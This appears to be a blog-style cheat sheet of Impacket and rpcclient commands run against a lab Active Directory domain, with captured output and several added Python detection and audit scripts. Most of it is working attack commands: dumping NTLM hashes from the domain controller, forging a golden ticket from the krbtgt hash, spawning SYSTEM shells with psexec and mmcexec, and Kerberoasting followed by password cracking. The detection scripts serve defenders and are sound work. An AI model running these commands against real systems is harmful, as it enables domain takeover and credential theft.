Impacket
Just a reminder of some Impacket commands (secretsdump, golden ticket generation, Kerberoast, …).
DC: NTLM hash dump, with history
$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:6ced6cb821b81327d4b8b096947e0615::: (status=Enabled)
Administrateur_history0:500:aad3b435b51404eeaad3b435b51404ee:6ced6cb821b81327d4b8b096947e0615:::
Administrateur_history1:500:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Cleaning up...
DC: NTLM hash dump, one user only
$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c40b7d2951af2ec4fbb356e3e99cf7a3::: (status=Disabled)
[*] Cleaning up...
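The two dumps above share one line format (domain\uid:rid:lmhash:nthash::: plus an optional status, with _historyN entries when -history is used). As an added example that is not part of the original post or of Impacket, this is the kind of hygiene audit a blue team runs over such a dump: it groups the history entries per account, flags accounts that still store an LM hash, that reuse a previous password, or that share one password across accounts. The sample input copies the three Administrateur lines above and adds constructed "legacy", "tjoker" and history2 entries.

```python
import re
from collections import defaultdict

# Constructed sample in the secretsdump.py "-history -user-status -just-dc-ntlm" format.
# The first three lines copy the output above; the others are made up to exercise the checks.
SAMPLE = """\
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:6ced6cb821b81327d4b8b096947e0615::: (status=Enabled)
Administrateur_history0:500:aad3b435b51404eeaad3b435b51404ee:6ced6cb821b81327d4b8b096947e0615:::
Administrateur_history1:500:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
Administrateur_history2:500:aad3b435b51404eeaad3b435b51404ee:6ced6cb821b81327d4b8b096947e0615:::
legacy:1105:e52cac67419a9a224a3b108f3fa6cb6d:0123456789abcdef0123456789abcdef::: (status=Enabled)
tjoker:1110:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef::: (status=Enabled)
"""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", i.e. no LM hash stored
LINE = re.compile(r"^(?P<name>[^:]+?)(?:_history(?P<idx>\d+))?:(?P<rid>\d+):"
                  r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::(?: \(status=(?P<status>\w+)\))?$")

def parse_dump(text):
    """Group the current hash and the _historyN entries per account; other lines are skipped."""
    accounts = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        a = accounts.setdefault(m["name"], {"rid": m["rid"], "lm": None, "nt": None,
                                            "status": None, "history": {}})
        if m["idx"] is None:
            a.update(lm=m["lm"], nt=m["nt"], status=m["status"])
        else:
            a["history"][int(m["idx"])] = m["nt"]   # history0 is the current password
    return accounts

def audit(accounts):
    """Password-hygiene findings worth raising from such a dump."""
    findings = []
    for name, a in sorted(accounts.items()):
        if a["nt"] is None:
            continue
        if a["lm"] != EMPTY_LM:
            findings.append((name, "LM hash still stored"))
        if a["nt"] in [h for i, h in a["history"].items() if i > 0]:
            findings.append((name, "current password reused from history"))
    by_hash = defaultdict(list)
    for name, a in accounts.items():
        if a["nt"]:
            by_hash[a["nt"]].append(name)
    for names in by_hash.values():
        if len(names) > 1:
            findings.append((",".join(sorted(names)), "same password on several accounts"))
    return findings
```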
DC: GetADUsers (name, email, PasswordLastSet, LastLogon, description)
# Caution: the description column was added by me, and this script also gets accounts without an email
$ python GetADUsers.py FOO.LOCAL/hacker:Password123
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Querying FOO.LOCAL for information about domain. Be patient...
Name Email PasswordLastSet LastLogon Description
-------------- ----- ------------------- ------------------- ----------------------------------------------------
Administrateur 2017-07-12 16:03:33 2015-05-18 11:31:43 Compte d’utilisateur d’administration
Invité <never> <never> Compte d’utilisateur invité
2017-07-12 16:03:12 2017-07-12 16:03:15
krbtgt 2014-12-11 13:35:44 <never> Compte de service du centre de distribution de clés
test 2014-12-11 13:47:27 2014-12-15 14:21:34 pwd : powa1234!
2015-05-13 09:14:39 2015-05-18 11:45:32
2014-12-15 11:20:17 2014-12-15 13:54:21
fdupont <never> <never> pwd : P4ssw0rd!!
tlastname <never> <never> pwd : P4ssw0rd!
bwayne <never> <never> pwd : P4ssw0rd!
cklent <never> <never> pwd : P4ssw0rd!
tjoker 2015-05-13 09:40:34 2015-05-13 09:42:26 pwd : P4ssw0rd!
tbatman <never> <never> pwd : P4ssw0rd!
test0000 <never> <never>
hacker 2017-07-12 16:04:57 <never>
Shell spawn (to run a single command instead, append it to the command line)
$ python mmcexec.py FOO.LOCAL/Administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
foo\administrateur
Shell spawn with Kerberos
$ export KRB5CCNAME=administrateur.ccache
$ python psexec.py -k -no-pass FOO.LOCAL/administrateur@DC1.foo.local
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Requesting shares on DC1.foo.local.....
[*] Found writable share ADMIN$
[*] Uploading file ypDKgeHL.exe
[*] Opening SVCManager on DC1.foo.local.....
[*] Creating service iqzz on DC1.foo.local.....
[*] Starting service iqzz.....
[!] Press help for extra shell commands
Microsoft Windows [version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tous droits réservés.
C:\Windows\system32>whoami
autorite nt\système
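The psexec.py session above leaves a clear trace on the target: a service with a 4-letter name ("iqzz") pointing at an 8-letter executable ("ypDKgeHL.exe") uploaded to ADMIN$, both generated per run. As an added example that is not from the original post or from Impacket, this is a small detection over constructed System-log 7045 (service installed) records; the field names and events are my assumptions, and the first record reuses the names printed above.

```python
import re

# Constructed System-log "7045: A service was installed" records. The first copies the names
# psexec.py printed above (service "iqzz", binary "ypDKgeHL.exe"); the others are benign or noise.
EVENTS = [
    {"EventID": 7045, "Computer": "DC1.foo.local", "ServiceName": "iqzz",
     "ImagePath": "%SystemRoot%\\ypDKgeHL.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "DC1.foo.local", "ServiceName": "BackupAgent",
     "ImagePath": "\"C:\\Program Files\\Vendor\\BackupAgent.exe\" -svc", "AccountName": "LocalSystem"},
    {"EventID": 7045, "Computer": "PC1.foo.local", "ServiceName": "vjQt",
     "ImagePath": "%SystemRoot%\\kLmNoPqR.exe", "AccountName": "LocalSystem"},
    {"EventID": 7036, "Computer": "PC1.foo.local", "ServiceName": "Spooler",
     "ImagePath": "", "AccountName": ""},
]

# Patterns taken from the psexec.py session above: a 4-letter service name and an 8-letter
# .exe written to the root of ADMIN$ (C:\Windows).
RANDOM_SVC = re.compile(r"^[A-Za-z]{4}$")
RANDOM_EXE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)

def score_service_install(ev):
    """Reasons a 7045 record looks like an impacket-style remote service launch (empty = benign)."""
    reasons = []
    if ev.get("EventID") != 7045:
        return reasons
    if RANDOM_SVC.match(ev["ServiceName"]):
        reasons.append("4-letter random service name")
    if RANDOM_EXE.match(ev["ImagePath"]):
        reasons.append("8-letter random executable in the Windows directory")
    if reasons and ev.get("AccountName") == "LocalSystem":
        reasons.append("runs as LocalSystem")
    return reasons

def find_suspicious(events):
    """(host, service, reasons) for every record that triggers at least one rule."""
    hits = []
    for ev in events:
        reasons = score_service_install(ev)
        if reasons:
            hits.append((ev["Computer"], ev["ServiceName"], reasons))
    return hits
```

In a real pipeline this pairs well with 5145 share-access events for ADMIN$ from the same source, which is where the upload step shows up.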
GOLDEN TICKET!
- -nthash > NT hash of krbtgt
- -domain-sid > echo lsaquery | rpcclient 192.168.56.151 -U "FOO\limited_user%Password123"
- -domain > domain FQDN
- "Administrateur" > user for which the ticket is generated
$ python ticketer.py -nthash c40b7d2951af2ec4fbb356e3e99cf7a3 -domain-sid S-1-5-21-4043646307-996402590-333264239 -domain FOO.LOCAL Administrateur
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for foo.local/Administrateur
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrateur.ccache
Import Administrateur.ccache on Linux:
# Clear tickets
$ kdestroy
kdestroy: No credentials cache found while destroying cache
# List tickets
$ klist
klist: No credentials cache found (filename: /tmp/krb5cc_1000)
$ smbclient \\\\DC1.foo.local\\c$ -k
WARNING: The "syslog" option is deprecated
SPNEGO: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INTERNAL_ERROR
$ cp Administrateur.ccache /tmp/krb5cc_1000; klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Administrateur@FOO.LOCAL
Valid starting Expires Service principal
12/07/2017 16:49:34 10/07/2027 16:49:34 krbtgt/FOO.LOCAL@FOO.LOCAL
renew until 10/07/2027 16:49:34
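The klist output above is the forged ticket's giveaway: a TGT valid from 12/07/2017 to 10/07/2027, ten years, where a KDC with default policy issues 10-hour TGTs. As an added example that is not part of the original post, this parses klist output and reports tickets whose validity exceeds the default lifetimes; it assumes DD/MM/YYYY dates (the French locale of the capture above) and the sample adds a constructed, normal-looking service ticket.

```python
import re
from datetime import datetime, timedelta

# Constructed klist output: the first ticket copies the golden ticket shown above, the second
# is a normal service ticket. Dates are assumed to be DD/MM/YYYY as in the capture above.
KLIST_OUTPUT = """\
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: Administrateur@FOO.LOCAL

Valid starting       Expires              Service principal
12/07/2017 16:49:34  10/07/2027 16:49:34  krbtgt/FOO.LOCAL@FOO.LOCAL
\trenew until 10/07/2027 16:49:34
13/07/2017 09:00:00  13/07/2017 19:00:00  cifs/DC1.foo.local@FOO.LOCAL
"""

TICKET = re.compile(r"^(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\s+"
                    r"(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\s+(\S+)$")
DATE_FMT = "%d/%m/%Y %H:%M:%S"
MAX_TGT_LIFE = timedelta(hours=10)         # AD default "Maximum lifetime for user ticket"
MAX_SERVICE_LIFE = timedelta(minutes=600)  # AD default "Maximum lifetime for service ticket"

def parse_klist(text):
    """One dict per ticket line; header and 'renew until' lines are skipped."""
    tickets = []
    for line in text.splitlines():
        m = TICKET.match(line.strip())
        if m:
            start, end, spn = m.groups()
            tickets.append({"start": datetime.strptime(start, DATE_FMT),
                            "end": datetime.strptime(end, DATE_FMT), "spn": spn})
    return tickets

def overlong_tickets(text):
    """(spn, lifetime in days) for tickets longer than the default KDC policy could issue."""
    hits = []
    for t in parse_klist(text):
        limit = MAX_TGT_LIFE if t["spn"].startswith("krbtgt/") else MAX_SERVICE_LIFE
        life = t["end"] - t["start"]
        if life > limit:
            hits.append((t["spn"], life.days))
    return hits
```

On the KDC side the same ticket shows up as 4769 service-ticket requests for an account with no matching 4768 TGT request, since the TGT never came from the DC.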
smbclient with Kerberos
$ smbclient \\\\DC1.foo.local\\c$ -k
WARNING: The "syslog" option is deprecated
smb: \> dir
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
inetpub D 0 Fri Apr 17 09:50:04 2015
pagefile.sys AHS 1073741824 Mon May 18 11:28:29 2015
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Thu Dec 11 13:32:02 2014
Program Files (x86) DR 0 Thu Dec 11 13:32:04 2014
ProgramData DH 0 Thu Dec 11 13:38:09 2014
Recovery DHS 0 Thu Dec 11 11:59:44 2014
System Volume Information DHS 0 Thu Dec 11 13:32:16 2014
Users DR 0 Thu Dec 11 12:00:27 2014
Windows D 0 Wed Jul 12 16:28:03 2017
WSUS D 0 Fri Jan 9 11:27:01 2015
6527487 blocks of size 4096. 4199729 blocks available
smb: \>
Get user SPNs
$ python GetUserSPNs.py FOO.LOCAL/Administrateur:P4ssw0rd\!
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
No entries found!
WITH RPCCLIENT
Get Domain SID
# Anonymous
$ rpcclient 192.168.56.151 -U "" -N
# With creds
$ rpcclient 192.168.56.151 -U "FOO\Hacker%Password123"
rpcclient $> lsaquery
Domain Name: FOO
Domain Sid: S-1-5-21-4043646307-996402590-333264239
Get user SID
$ rpcclient 192.168.56.151 -U "FOO\Hacker%Password123"
rpcclient $> lookupnames krbtgt
krbtgt S-1-5-21-4043646307-996402590-333264239-502 (User: 1)
rpcclient $> lookupnames administrateur
administrateur S-1-5-21-4043646307-996402590-333264239-500 (User: 1)
rpcclient $>
Navigate with SMB
$ smbclient \\\\DC1.foo.local\\c$ -U "FOO\administrateur"
WARNING: The "syslog" option is deprecated
Enter FOO\administrateur's password:
smb: \> dir
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
inetpub D 0 Fri Apr 17 09:50:04 2015
pagefile.sys AHS 1073741824 Mon May 18 11:28:29 2015
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Thu Dec 11 13:32:02 2014
Program Files (x86) DR 0 Thu Dec 11 13:32:04 2014
ProgramData DH 0 Thu Dec 11 13:38:09 2014
Recovery DHS 0 Thu Dec 11 11:59:44 2014
System Volume Information DHS 0 Thu Dec 11 13:32:16 2014
Users DR 0 Thu Dec 11 12:00:27 2014
Windows D 0 Wed Jul 12 16:28:03 2017
WSUS D 0 Fri Jan 9 11:27:01 2015
6527487 blocks of size 4096. 4199745 blocks available
smb: \>
Kerberoast - SPN
$ python GetUserSPNs.py -request FOO.LOCAL/hacker:Password123
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------- -------- --------------- ---------
http/PC1 userspn <never> <never>
$krb5tgs$23$*userspn$FOO.LOCAL$http/PC1*$f33c6a7ab50147a947f4137c026094bc$[...]
Cracking SPN tickets
$ python GetUserSPNs.py -request -o /tmp/hash FOO.LOCAL/hacker:Password123
Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------- -------- --------------- ---------
http/PC1 userspn <never> <never>
# Hashcat
$ hashcat -m 13100 /tmp/hash /tmp/wordlist
# John
$ ~/Programs/JohnTheRipper/run/john --wordlist=/tmp/wordlist /tmp/hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Http1234 (?)
1g 0:00:00:00 DONE (2017-07-13 14:24) 50.00g/s 50.00p/s 50.00c/s 50.00C/s Http1234
Use the "--show" option to display all of the cracked passwords reliably
Session completed
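The $krb5tgs$23$ prefix above means the service ticket was issued with RC4-HMAC (etype 23), which is what makes it crackable offline this fast. On the DC that request is a 4769 event with TicketEncryptionType 0x17, and a kerberoasting run produces several of them for one account within seconds. As an added example that is not from the original post, this is a windowed detection over constructed 4769 records (field names and events are my assumptions).

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"             # etype 23, the encryption the $krb5tgs$23$ hash above came with
WINDOW = timedelta(minutes=5)
THRESHOLD = 3                 # distinct RC4 service tickets for one account inside WINDOW

# Constructed Security-log 4769 (TGS request) records: "hacker" asks for several RC4 tickets
# within seconds, as GetUserSPNs.py -request does; "bwayne" is normal traffic.
EVENTS = [
    {"time": "2017-07-13 14:20:01", "user": "hacker@FOO.LOCAL", "service": "userspn", "etype": "0x17"},
    {"time": "2017-07-13 14:20:02", "user": "hacker@FOO.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"time": "2017-07-13 14:20:02", "user": "hacker@FOO.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"time": "2017-07-13 14:20:03", "user": "hacker@FOO.LOCAL", "service": "PC1$", "etype": "0x17"},
    {"time": "2017-07-13 14:21:00", "user": "bwayne@FOO.LOCAL", "service": "DC1$", "etype": "0x12"},
    {"time": "2017-07-13 16:05:00", "user": "bwayne@FOO.LOCAL", "service": "svc_sql", "etype": "0x17"},
]

def kerberoast_candidates(events):
    """account -> sorted RC4 service targets, for accounts reaching THRESHOLD inside one WINDOW."""
    per_user = defaultdict(list)
    for ev in events:
        # machine accounts (name$) and the TGT service itself are not kerberoast targets
        if ev["etype"] != RC4_HMAC or ev["service"].endswith("$") or ev["service"] == "krbtgt":
            continue
        t = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        per_user[ev["user"]].append((t, ev["service"]))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):      # slide the window over the sorted requests
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= WINDOW}
            if len(in_window) >= THRESHOLD:
                hits[user] = sorted(in_window)
                break
    return hits
```

The durable fix is on the account side: long random passwords for service accounts (or group Managed Service Accounts) and AES-only encryption types, so that any 0x17 request becomes a finding in itself.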
Mounting CIFS with a Kerberos ticket
$ sudo mount -t cifs -o "sec=krb5,cruid=$UID,user=Administrateur,domain=FOO.BAR" //AD1.FOO.BAR/C$ /mnt/test -vvv